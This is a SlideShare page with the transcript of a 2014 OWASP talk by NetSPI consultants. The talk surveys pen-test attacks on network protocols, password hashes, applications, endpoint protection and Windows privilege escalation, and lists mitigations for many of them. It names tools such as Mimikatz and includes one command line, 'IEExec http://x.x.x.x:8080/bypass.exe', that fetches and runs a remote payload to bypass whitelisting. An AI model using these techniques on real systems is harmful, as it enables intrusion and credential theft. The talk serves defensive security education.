0
Attack All the Layers:
What’s Working During Pen Tests
Scott Sutherland and Karl Fosaaen
Introductions
• Scott Sutherland
‒ Principal Security Consultant @ NetSPI
‒ Twitter: @_nullbind
• Karl Fosaaen
‒ Senior Se...
Overview
• Why do Companies Pen Test?
• Attacking Protocols
• Attacking Passwords
• Attacking Applications
• Bypassing End...
Why do companies pen test?
• Compliance requirements
• Evaluate risks associated with an acquisition or
partnership
• Vali...
Overview
• Attacking Protocols
• Attacking Passwords
• Attacking Applications
• Bypassing End Point Protection
• Windows E...
Attacking protocols
• ARP: Address Resolution Protocol
• NBNS: NetBIOS Name Service
• SMB: Server Message Block
• PXE: Pre...
Attacking protocols: ARP
Address
Resolution
Protocol
Attacking protocols: ARP
• General
‒MAC to IP association
‒Layer 2
• Conditions
‒Independent of user action
‒Broadcast net...
Attacking protocols: ARP
Attacking protocols: ARP
• Common mitigating controls:
‒ Dynamic ARP Inspection
‒ Port Security
‒ Static Routes (not recom...
Attacking protocols: NBNS / LLMNR
NetBIOS
Name
Service
Attacking protocols: NBNS
• General
‒ IP to hostname association
‒ Layer 5 / 7
• Constraints
‒ Dependent on user action
‒ ...
Attacking protocols: NBNS
Attacking protocols: NBNS
Attacking protocols: NBNS
Attacking protocols: NBNS
• Common mitigating controls:
‒ Create a WPAD (Web Proxy Auto-Discovery) server entry in
DNS
‒ D...
Attacking protocols: SMB
Server
Message
Block
Attacking protocols: SMB
• General
‒ SMB is the come back kid!
‒ Layer 7
• Constraints
‒ Dependent on user action
‒ Any ro...
Attacking protocols: SMB
Attacking protocols: SMB
• Historically, SMB Relay has been used to:
‒ Execute arbitrary commands
‒ Obtain shells
• Lately...
Attacking protocols: SMB
• Common mitigating controls:
‒ Enable packet signing to help prevent SMB Relay attacks
‒ Apply r...
Attacking protocols: PXE
Preboot
eXecution
Environment
Attacking protocols: PXE
• General
‒ DHCP
• Constraints
‒ Broadcast domain
• Attacks
‒ Command execution
‒ Access to file ...
Attacking protocols: PXE
• Common mitigating controls:
‒ Isolate networks
‒ Add device validation
Attacking protocols: DTP
Dynamic
Trunking
Protocol
Attacking protocols: DTP
• General
‒ 802.1Q encapsulation is in use
‒ Layer 2
• Constraints
‒ Independent of user action
‒...
Attacking protocols: DTP
Attacking protocols: DTP
Attacking protocols: DTP
Attacking protocols: DTP
Attacking protocols: DTP
• Common mitigating controls:
‒ Use dedicated VLAN ID for all trunking ports
‒ Disable all unused...
Overview
• Attacking Protocols
• Attacking Passwords
• Attacking Applications
• Bypassing End Point Protection
• Windows E...
Attacking passwords
• Hashes and Cracking (Offline)
• Dictionary Attacks (Online)
• Dump in Cleartext!
Attacking Passwords
Tool Function Year
Pass the Hash Passing Hashes 1997
Rainbow Tables Password Cracking 2000s
SMB Relay ...
Attacking Passwords: Hashes
• What are hashes?
‒ A non-reversible way of storing passwords
‒ Operating systems and applica...
Attacking Passwords: Hashes
• How do we get hashes?
‒ Cain and Abel
‒ fgdump
‒ Metasploit
‒ Mimikatz
‒ Databases
‒ Config ...
Attacking Passwords: Cracking
• Cracking Hashes
‒ Rainbow Tables
‒ John the Ripper
‒ oclHashcat
‒ CPU versus GPU
Attacking Passwords: Cracking
0
100
200
300
400
500
600
Minutes for Six Character Brute Force
CPU GPU
Attacking Passwords: CrackingGPUCPU
Attacking Passwords: Passing Hashes
• Passing Hashes
‒ Metasploit
‒ psexec
‒ winexec
‒ PTH toolkit
Attacking Passwords: Dictionary
• Online Vs. Offline Attacks
• Dictionary Attacks
‒ Enumerate users
• Null SMB logins, RPC...
Attacking Passwords: Cleartext
• Common application configs
• Reversible Formats
‒ Find in files
‒ Groups.xml
‒ Unattend.x...
Overview
• Attacking Protocols
• Attacking Passwords
• Attacking Applications
• Bypassing End Point Protection
• Windows E...
Attacking Applications: Common
• Default and weak passwords
• SQL injection
• RFI/web shells
• Web directory traversals
• ...
Attacking Applications: Breakouts
• Obtain a common dialog box
• Bypass folder path and file type restrictions
• Bypass fi...
Overview
• Attacking Protocols
• Attacking Passwords
• Attacking Applications
• Bypassing End Point Protection
• Windows E...
Bypassing EPP: Anti-virus
• PowerShell code Injection
• Execute off network share
• Clone resource tables
• Modify import ...
Bypassing EPP: App White List
• Execution via approved apps
‒ Powershell Code Injection
‒ Rundll32 mydll,DLLMain@12
‒ IEEx...
Overview
• Attacking Protocols
• Attacking Passwords
• Attacking Applications
• Bypassing End Point Protection
• Windows E...
Windows Escalation: Overview
• Privilege Escalation Goals
• Local Privilege Escalation
• Domain Privilege Escalation
Windows Escalation: Goals
• Local Escalation Goals
‒ Find clear text or reversible credentials with local
administrative p...
Windows Escalation: Local
• Local Escalation
‒ *Clear text credentials in files, registry, over network
‒ Insecure service...
Windows Escalation: Domain
• Domain Escalation – Find DAs
‒ Check locally! (Processes, Tokens, Cachedump)
‒ Review active ...
Windows Escalation: Domain
• Domain Escalation – Impersonate DAs
‒ Dump passwords from memory with Mimikatz
‒ Migrate into...
Conclusions
• Most Networks
‒ Kind of broken
• Most Protocols
‒ Kind of broken
• Most Applications
‒ Kind of broken
All ca...
Attack all the layers!
• Any questions?
Attack all the layers!
• Scott Sutherland
‒ Principal Security Consultant
‒ Twitter: @_nullbind
• Karl Fosaaen
‒ Senior Se...
Attack All the Layers: What's Working during Pentests (OWASP NYC)
Upcoming SlideShare
Loading in...5
×

Attack All the Layers: What's Working during Pentests (OWASP NYC)

744

Published on

This presentation is intended to provide an overview of vulnerabilities and attack techniques that are popular in penetration testing at the moment. Vulnerabilities related to the application, network, and server layers will be covered along with current anti-virus bypass and privilege escalation techniques used by attackers and penetration testers. This presentation should be interesting to security professionals and system administrators looking for more insight into real world attacks.

This is the version modified for the OWASP meeting in June of 2014.

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
744
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
58
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Transcript of "Attack All the Layers: What's Working during Pentests (OWASP NYC)"

  1. 1. Attack All the Layers: What’s Working During Pen Tests Scott Sutherland and Karl Fosaaen
  2. 2. Introductions • Scott Sutherland ‒ Principal Security Consultant @ NetSPI ‒ Twitter: @_nullbind • Karl Fosaaen ‒ Senior Security Consultant @ NetSPI ‒ Twitter: @kfosaaen We specialize in both things and stuff!
  3. 3. Overview • Why do Companies Pen Test? • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation • Conclusions
  4. 4. Why do companies pen test? • Compliance requirements • Evaluate risks associated with an acquisition or partnership • Validate preventative controls • Validate detective controls • Prioritize internal security initiatives • Proactively prevent breaches
  5. 5. Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
  6. 6. Attacking protocols • ARP: Address Resolution Protocol • NBNS: NetBIOS Name Service • SMB: Server Message Block • PXE: Preboot Execution Environment • DTP: Dynamic Trunking Protocol
  7. 7. Attacking protocols: ARP Address Resolution Protocol
  8. 8. Attacking protocols: ARP • General ‒MAC to IP association ‒Layer 2 • Conditions ‒Independent of user action ‒Broadcast network • Attacks ‒MITM Monitoring ‒MITM Injection ‒DOS
  9. 9. Attacking protocols: ARP
  10. 10. Attacking protocols: ARP • Common mitigating controls: ‒ Dynamic ARP Inspection ‒ Port Security ‒ Static Routes (not recommended)
  11. 11. Attacking protocols: NBNS / LLMNR NetBIOS Name Service
  12. 12. Attacking protocols: NBNS • General ‒ IP to hostname association ‒ Layer 5 / 7 • Constraints ‒ Dependent on user action ‒ Broadcast Network ‒ Windows Only • Attacks ‒ MITM Monitoring ‒ MITM Injection ‒ DOS
  13. 13. Attacking protocols: NBNS
  14. 14. Attacking protocols: NBNS
  15. 15. Attacking protocols: NBNS
  16. 16. Attacking protocols: NBNS • Common mitigating controls: ‒ Create a WPAD (Web Proxy Auto-Discovery) server entry in DNS ‒ Disable NBNS (recommended) • Might cause issues with legacy apps ‒ Disable insecure authentication to help • limit impact of exposed hashes ‒ Enable packet signing to help prevent • SMB Relay attacks
  17. 17. Attacking protocols: SMB Server Message Block
  18. 18. Attacking protocols: SMB • General ‒ SMB is the come back kid! ‒ Layer 7 • Constraints ‒ Dependent on user action ‒ Any routable network ‒ No connecting back to originating host • Attacks ‒ Command execution ‒ Shells..aaand shells
  19. 19. Attacking protocols: SMB
  20. 20. Attacking protocols: SMB • Historically, SMB Relay has been used to: ‒ Execute arbitrary commands ‒ Obtain shells • Lately the community has been developing tools for doing things like: ‒ LDAP queries ‒ SQL queries ‒ Exchange services ‒ Mounting file systems
  21. 21. Attacking protocols: SMB • Common mitigating controls: ‒ Enable packet signing to help prevent SMB Relay attacks ‒ Apply really old patches like if you missed out on the last decade…
  22. 22. Attacking protocols: PXE Preboot eXecution Environment
  23. 23. Attacking protocols: PXE • General ‒ DHCP • Constraints ‒ Broadcast domain • Attacks ‒ Command execution ‒ Access to file system/images
  24. 24. Attacking protocols: PXE • Common mitigating controls: ‒ Isolate networks ‒ Add device validation
  25. 25. Attacking protocols: DTP Dynamic Trunking Protocol
  26. 26. Attacking protocols: DTP • General ‒ 802.1Q encapsulation is in use ‒ Layer 2 • Constraints ‒ Independent of user action ‒ Trunking is set to enabled • or auto on switch port • Attacks ‒ Monitor network traffic for all VLANs, because all VLANs are • allowed on a trunk by default • *Full VLAN hopping
  27. 27. Attacking protocols: DTP
  28. 28. Attacking protocols: DTP
  29. 29. Attacking protocols: DTP
  30. 30. Attacking protocols: DTP
  31. 31. Attacking protocols: DTP • Common mitigating controls: ‒ Use dedicated VLAN ID for all trunking ports ‒ Disable all unused ports and place them on a non-routable VLAN ‒ Configure all user ports as access ports to prevent trunk negotiation ‒ Configure frames with two 802.1Q headers ‒ Configure strong VACLs
  32. 32. Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
  33. 33. Attacking passwords • Hashes and Cracking (Offline) • Dictionary Attacks (Online) • Dump in Cleartext!
  34. 34. Attacking Passwords Tool Function Year Pass the Hash Passing Hashes 1997 Rainbow Tables Password Cracking 2000s SMB Relay Relaying Captured Hashes 2001 John the Ripper Password Cracking 2001 NetNTLM.pl Cracking Network Hashes 2007 PTH Toolkit Pass all the Hashes 2008 Hashcat CPU and GPU Cracking 2010 WCE and Mimikatz Cleartext Windows Creds 2012
  35. 35. Attacking Passwords: Hashes • What are hashes? ‒ A non-reversible way of storing passwords ‒ Operating systems and applications ‒ Lots of types • LM/NTLM • Network and Local • MD5 • SHA • descrypt
  36. 36. Attacking Passwords: Hashes • How do we get hashes? ‒ Cain and Abel ‒ fgdump ‒ Metasploit ‒ Mimikatz ‒ Databases ‒ Config files
  37. 37. Attacking Passwords: Cracking • Cracking Hashes ‒ Rainbow Tables ‒ John the Ripper ‒ oclHashcat ‒ CPU versus GPU
  38. 38. Attacking Passwords: Cracking 0 100 200 300 400 500 600 Minutes for Six Character Brute Force CPU GPU
  39. 39. Attacking Passwords: CrackingGPUCPU
  40. 40. Attacking Passwords: Passing Hashes • Passing Hashes ‒ Metasploit ‒ psexec ‒ winexec ‒ PTH toolkit
  41. 41. Attacking Passwords: Dictionary • Online Vs. Offline Attacks • Dictionary Attacks ‒ Enumerate users • Null SMB logins, RPC, *SID BF, SNMP, LDAP, SharePoint, etc. ‒ Attack! • Are users getting smarter? ‒ Sort of… • “Summer2014” meets password • complexity requirements
  42. 42. Attacking Passwords: Cleartext • Common application configs • Reversible Formats ‒ Find in files ‒ Groups.xml ‒ Unattend.xml ‒ Registry • WCE • Mimikatz
  43. 43. Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
  44. 44. Attacking Applications: Common • Default and weak passwords • SQL injection • RFI/web shells • Web directory traversals • UNC path injection + SMB relay • Critical missing patches
  45. 45. Attacking Applications: Breakouts • Obtain a common dialog box • Bypass folder path and file type restrictions • Bypass file execution restrictions • Bypass file black/white lists • Access to native consoles and management tools • Downloading and use third party applications
  46. 46. Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
  47. 47. Bypassing EPP: Anti-virus • PowerShell code Injection • Execute off network share • Clone resource tables • Modify import tables • Pack files
  48. 48. Bypassing EPP: App White List • Execution via approved apps ‒ Powershell Code Injection ‒ Rundll32 mydll,DLLMain@12 ‒ IEExec http://x.x.x.x:8080/bypass.exe • Exceptions ‒ File name ‒ Publisher ‒ Directory • Excessive privileges ‒ Services and policy
  49. 49. Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
  50. 50. Windows Escalation: Overview • Privilege Escalation Goals • Local Privilege Escalation • Domain Privilege Escalation
  51. 51. Windows Escalation: Goals • Local Escalation Goals ‒ Find clear text or reversible credentials with local administrative privileges ‒ Get application to run commands as Administrator or LocalSystem • Domain Escalation Goals ‒ Find Domain Admins ‒ Impersonate Domain Admins
  52. 52. Windows Escalation: Local • Local Escalation ‒ *Clear text credentials in files, registry, over network ‒ Insecure service paths ‒ DLL preloading ‒ DLL and exe replacement ‒ Binary planting in auto-run locations (reg and file system) ‒ Modifying schedule tasks ‒ *Local and remote exploits ‒ Leverage local application like IIS, SQL Server etc ‒ *UNC path injection + SMB Relay / Capture + crack
  53. 53. Windows Escalation: Domain • Domain Escalation – Find DAs ‒ Check locally! (Processes, Tokens, Cachedump) ‒ Review active sessions – netsess (veil) ‒ Review remote processes - tasklist ‒ Service Principal Names (SPN) – get-spn ‒ Scanning Remote Systems for NetBIOS Information - nbtscan ‒ Pass the hash to other systems ‒ PowerShell shell spraying ‒ WINRM/WINRS shell spraying ‒ Psexec shell spraying
  54. 54. Windows Escalation: Domain • Domain Escalation – Impersonate DAs ‒ Dump passwords from memory with Mimikatz ‒ Migrate into the Domain Admin’s process ‒ Steal Domain Admins delegation tokens with Incognito ‒ Dump cached domain admin hashes with cachedump ‒ Relatively new techniques • PTH using Kerberos ticket
  55. 55. Conclusions • Most Networks ‒ Kind of broken • Most Protocols ‒ Kind of broken • Most Applications ‒ Kind of broken All can kind of be fixed
  56. 56. Attack all the layers! • Any questions?
  57. 57. Attack all the layers! • Scott Sutherland ‒ Principal Security Consultant ‒ Twitter: @_nullbind • Karl Fosaaen ‒ Senior Security Consultant ‒ Twitter: @kfosaaen
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×